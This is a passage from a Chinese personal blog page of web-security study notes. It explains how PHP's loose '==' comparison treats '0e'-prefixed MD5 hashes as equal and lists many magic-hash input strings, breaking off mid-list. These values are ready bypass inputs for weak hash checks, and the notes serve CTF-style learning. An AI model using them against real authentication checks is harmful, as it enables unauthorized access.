<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>tyc的小窝</title>
  <meta name="keywords" content="">
  <meta name="description" content="tyc的小窝">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="小迪安全基础入门名词解释web应用框架常规的Web应用搭建 购买云服务器，购买域名  HTTP 请求头各参数具体含义​			HTTP的头域包括通用头、请求头、响应头和实体头四个部分。每个头域由一个域名，冒号（:）和域值三部分组成。 ​			通用头部：是客户端和服务器都可以使用的头部，可以在客户端、服务器和其他应用程序之间提供一些非常有用的通用功能，如Date头部。​			请求头部：是请求报文特有的">
<meta property="og:type" content="article">
<meta property="og:title" content="tyc的小窝">
<meta property="og:url" content="http://example.com/2024/03/28/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/index.html">
<meta property="og:site_name" content="tyc的小窝">
<meta property="og:description" content="小迪安全基础入门名词解释web应用框架常规的Web应用搭建 购买云服务器，购买域名  HTTP 请求头各参数具体含义​			HTTP的头域包括通用头、请求头、响应头和实体头四个部分。每个头域由一个域名，冒号（:）和域值三部分组成。 ​			通用头部：是客户端和服务器都可以使用的头部，可以在客户端、服务器和其他应用程序之间提供一些非常有用的通用功能，如Date头部。​			请求头部：是请求报文特有的">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-03-28T05:19:32.752Z">
<meta property="article:modified_time" content="2024-03-28T14:36:06.688Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>John Doe</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(20)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="20">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2024/03/28/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-28 13:19:32">2024/03/28</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/27/vim/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-27 14:16:22">2024/03/27</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/25/%E9%98%B2%E7%81%AB%E5%A2%99/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-25 23:12:18">2024/03/25</span>
        </a>
        
        
        <a  class="All "
           href="/2024/03/23/docker/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-03-23 18:12:23">2024/03/23</span>
        </a>
        
        
        <a  class="All "
           href="/2023/12/22/java/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-12-22 15:33:09">2023/12/22</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/%E9%99%87%E5%89%91%E6%9D%AF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 22:25:24">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/%E9%B9%8F%E7%A8%8B%E6%9D%AFmisc/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 16:23:25">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/11/05/hexo%E8%BF%81%E7%A7%BB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-11-05 15:50:09">2023/11/05</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/28/web%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-28 17:31:11">2023/09/28</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/27/misc/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-27 16:21:55">2023/09/27</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/21/%E9%9A%8F%E7%AC%94/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-21 13:54:35">2023/09/21</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/08/win%E7%AB%AF%E5%8F%A3%E5%8D%A0%E7%94%A8%E6%9F%A5%E8%AF%A2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-09-08 15:32:06">2023/09/08</span>
        </a>
        
        
        <a  class="All "
           href="/2023/08/09/%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%88Mysql)/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-08-09 18:49:11">2023/08/09</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/26/%E6%8A%A4%E7%BD%91%E8%A1%8C%E5%8A%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-26 21:28:45">2023/07/26</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/26/linux%E7%B3%BB%E7%BB%9F%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-26 21:28:34">2023/07/26</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/22/%E7%88%AC%E8%99%AB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-07-22 23:06:24">2023/07/22</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/%E5%AF%86%E7%A0%81/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/pwn/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/Metasploit%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%A1%86%E6%9E%B6%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/11/Crypto%E5%BA%93/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-06-11 22:21:08">2023/06/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-web学习" class="article article-type-post" itemscope itemprop="blogPost">
    
    <div class="article-meta">
        
        
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2024-03-29 17:02:53'>2023-09-28 17:31</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web%E5%AD%A6%E4%B9%A0"><span class="toc-text">web学习</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#PHPMD5%E7%BB%95%E8%BF%87"><span class="toc-text">PHPMD5绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E2%80%9Coe%E2%80%9D-%E7%BB%95%E8%BF%87"><span class="toc-text">1 “oe” 绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87%EF%BC%88PHP-8-%E6%97%A0%E6%B3%95%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-text">数组绕过（PHP 8 无法绕过）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#md5-%E7%A2%B0%E6%92%9E"><span class="toc-text">md5 碰撞</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sqli-labs%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0"><span class="toc-text">sqli-labs靶场学习</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#less1"><span class="toc-text">less1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#less2"><span class="toc-text">less2</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#less3"><span class="toc-text">less3</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#less4"><span class="toc-text">less4</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-text">php反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E9%AD%94%E6%B3%95%E6%96%B9%E6%B3%95"><span class="toc-text">1.魔法方法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-text">2.序列化</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="web学习"><a href="#web学习" class="headerlink" title="web学习"></a>web学习</h3><h4 id="PHPMD5绕过"><a href="#PHPMD5绕过" class="headerlink" title="PHPMD5绕过"></a>PHPMD5绕过</h4><h4 id="1-“oe”-绕过"><a href="#1-“oe”-绕过" class="headerlink" title="1 “oe” 绕过"></a>1 “oe” 绕过</h4><p>​		因为处理hash字符串时，PHP会将每一个以 0E开头的哈希值解释为0，那么只要传入的不同字符串经过哈希以后是以 0E开头的，那么PHP会认为它们相同</p>
<p>​		基本的原理是这样的，但更严谨的字符串格式是，<code>0e</code> 开头，同时后面都是数字，不能包含其他字符的字符串，md5 值才会相等（<code>==</code> 的结果为 True，但 <code>===</code> 的结果为 False）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&quot;s878926199a&quot;</span>;</span><br><span class="line"><span class="variable">$b</span> = <span class="string">&quot;s155964671a&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$a</span> . <span class="string">&quot;--&gt;&quot;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$a</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$b</span> . <span class="string">&quot;--&gt;&quot;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line"><span class="comment">// s878926199a--&gt;0e545993274517709034328855841020</span></span><br><span class="line"><span class="comment">// s155964671a--&gt;0e342768416822451524974117254469</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$a</span>) == <span class="title function_ invoke__">md5</span>(<span class="variable">$b</span>)) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(true)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 数字 vs 数字</span></span><br><span class="line"><span class="variable">$a1</span> = <span class="string">&quot;0e33&quot;</span>;</span><br><span class="line"><span class="variable">$b1</span> = <span class="string">&quot;0e89&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="variable">$a1</span> == <span class="variable">$b1</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(true)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 数字 vs 字母</span></span><br><span class="line"><span class="variable">$a3</span> = <span class="string">&quot;0eadd&quot;</span>;</span><br><span class="line"><span class="variable">$b3</span> = <span class="string">&quot;0e232&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="variable">$a3</span> == <span class="variable">$b3</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(false)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 数字 vs 数字/字母</span></span><br><span class="line"><span class="variable">$a4</span> = <span class="string">&quot;0ea34343dd&quot;</span>;</span><br><span class="line"><span class="variable">$b4</span> = <span class="string">&quot;0e232&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">var_dump</span>(<span class="variable">$a4</span> == <span class="variable">$b4</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>); <span class="comment">// bool(false)</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>利用</p>
<p>常见的 md5 值是 <code>0e</code> 开头且后面均为数字的字符串</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br></pre></td><td class="code"><pre><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">s214587387a</span><br><span class="line"><span class="number">0e848240448830537924465865611904</span></span><br><span class="line">s214587387a</span><br><span class="line"><span class="number">0e848240448830537924465865611904</span></span><br><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br><span class="line">s1885207154a</span><br><span class="line"><span class="number">0e509367213418206700842008763514</span></span><br><span class="line">s1502113478a</span><br><span class="line"><span class="number">0e861580163291561247404381396064</span></span><br><span class="line">s1885207154a</span><br><span class="line"><span class="number">0e509367213418206700842008763514</span></span><br><span class="line">s1836677006a</span><br><span class="line"><span class="number">0e481036490867661113260034900752</span></span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">s1184209335a</span><br><span class="line"><span class="number">0e072485820392773389523109082030</span></span><br><span class="line">s1665632922a</span><br><span class="line"><span class="number">0e731198061491163073197128363787</span></span><br><span class="line">s1502113478a</span><br><span class="line"><span class="number">0e861580163291561247404381396064</span></span><br><span class="line">s1836677006a</span><br><span class="line"><span class="number">0e481036490867661113260034900752</span></span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">s1502113478a</span><br><span class="line"><span class="number">0e861580163291561247404381396064</span></span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">s1665632922a</span><br><span class="line"><span class="number">0e731198061491163073197128363787</span></span><br><span class="line">s155964671a</span><br><span class="line"><span class="number">0e342768416822451524974117254469</span></span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br><span class="line">s1836677006a</span><br><span class="line"><span class="number">0e481036490867661113260034900752</span></span><br><span class="line">s1885207154a</span><br><span class="line"><span class="number">0e509367213418206700842008763514</span></span><br><span class="line">s532378020a</span><br><span class="line"><span class="number">0e220463095855511507588041205815</span></span><br><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br><span class="line">s214587387a</span><br><span class="line"><span class="number">0e848240448830537924465865611904</span></span><br><span class="line">s1502113478a</span><br><span class="line"><span class="number">0e861580163291561247404381396064</span></span><br><span class="line">s1091221200a</span><br><span class="line"><span class="number">0e940624217856561557816327384675</span></span><br><span class="line">s1665632922a</span><br><span class="line"><span class="number">0e731198061491163073197128363787</span></span><br><span class="line">s1885207154a</span><br><span class="line"><span class="number">0e509367213418206700842008763514</span></span><br><span class="line">s1836677006a</span><br><span class="line"><span class="number">0e481036490867661113260034900752</span></span><br><span class="line">s1665632922a</span><br><span class="line"><span class="number">0e731198061491163073197128363787</span></span><br><span class="line">s878926199a</span><br><span class="line"><span class="number">0e545993274517709034328855841020</span></span><br><span class="line"><span class="number">240610708</span> </span><br><span class="line"><span class="number">0e462097431906509019562988736854</span></span><br><span class="line"><span class="number">314282422</span> </span><br><span class="line"><span class="number">0e990995504821699494520356953734</span></span><br><span class="line"><span class="number">571579406</span> </span><br><span class="line"><span class="number">0e972379832854295224118025748221</span></span><br><span class="line"><span class="number">903251147</span> </span><br><span class="line"><span class="number">0e174510503823932942361353209384</span></span><br><span class="line"><span class="number">1110242161</span> </span><br><span class="line"><span class="number">0e435874558488625891324861198103</span></span><br><span class="line"><span class="number">1320830526</span> </span><br><span class="line"><span class="number">0e912095958985483346995414060832</span></span><br><span class="line"><span class="number">1586264293</span> </span><br><span class="line"><span class="number">0e622743671155995737639662718498</span></span><br><span class="line"><span class="number">2302756269</span> </span><br><span class="line"><span class="number">0e250566888497473798724426794462</span></span><br><span class="line"><span class="number">2427435592</span> </span><br><span class="line"><span class="number">0e067696952328669732475498472343</span></span><br><span class="line"><span class="number">2653531602</span> </span><br><span class="line"><span class="number">0e877487522341544758028810610885</span></span><br><span class="line"><span class="number">3293867441</span> </span><br><span class="line"><span class="number">0e471001201303602543921144570260</span></span><br><span class="line"><span class="number">3295421201</span> </span><br><span class="line"><span class="number">0e703870333002232681239618856220</span></span><br><span class="line"><span class="number">3465814713</span> </span><br><span class="line"><span class="number">0e258631645650999664521705537122</span></span><br><span class="line"><span class="number">3524854780</span> </span><br><span class="line"><span class="number">0e507419062489887827087815735195</span></span><br><span class="line"><span class="number">3908336290</span> </span><br><span class="line"><span class="number">0e807624498959190415881248245271</span></span><br><span class="line"><span class="number">4011627063</span> </span><br><span class="line"><span class="number">0e485805687034439905938362701775</span></span><br><span class="line"><span class="number">4775635065</span> </span><br><span class="line"><span class="number">0e998212089946640967599450361168</span></span><br><span class="line"><span class="number">4790555361</span> </span><br><span class="line"><span class="number">0e643442214660994430134492464512</span></span><br><span class="line"><span class="number">5432453531</span> </span><br><span class="line"><span class="number">0e512318699085881630861890526097</span></span><br><span class="line"><span class="number">5579679820</span> </span><br><span class="line"><span class="number">0e877622011730221803461740184915</span></span><br><span class="line"><span class="number">5585393579</span> </span><br><span class="line"><span class="number">0e664357355382305805992765337023</span></span><br><span class="line"><span class="number">6376552501</span> </span><br><span class="line"><span class="number">0e165886706997482187870215578015</span></span><br><span class="line"><span class="number">7124129977</span> </span><br><span class="line"><span class="number">0e500007361044747804682122060876</span></span><br><span class="line"><span class="number">7197546197</span> </span><br><span class="line"><span class="number">0e915188576072469101457315675502</span></span><br><span class="line"><span class="number">7656486157</span> </span><br><span class="line"><span class="number">0e451569119711843337267091732412</span></span><br><span class="line">QLTHNDT </span><br><span class="line"><span class="number">0e405967825401955372549139051580</span></span><br><span class="line">QNKCDZO </span><br><span class="line"><span class="number">0e830400451993494058024219903391</span></span><br><span class="line">EEIZDOI </span><br><span class="line"><span class="number">0e782601363539291779881938479162</span></span><br><span class="line">TUFEPMC </span><br><span class="line"><span class="number">0e839407194569345277863905212547</span></span><br><span class="line">UTIPEZQ </span><br><span class="line"><span class="number">0e382098788231234954670291303879</span></span><br><span class="line">UYXFLOI </span><br><span class="line"><span class="number">0e552539585246568817348686838809</span></span><br><span class="line">IHKFRNS </span><br><span class="line"><span class="number">0e256160682445802696926137988570</span></span><br><span class="line">PJNPDWY </span><br><span class="line"><span class="number">0e291529052894702774557631701704</span></span><br><span class="line">ABJIHVY </span><br><span class="line"><span class="number">0e755264355178451322893275696586</span></span><br><span class="line">DQWRASX </span><br><span class="line"><span class="number">0e742373665639232907775599582643</span></span><br><span class="line">DYAXWCA </span><br><span class="line"><span 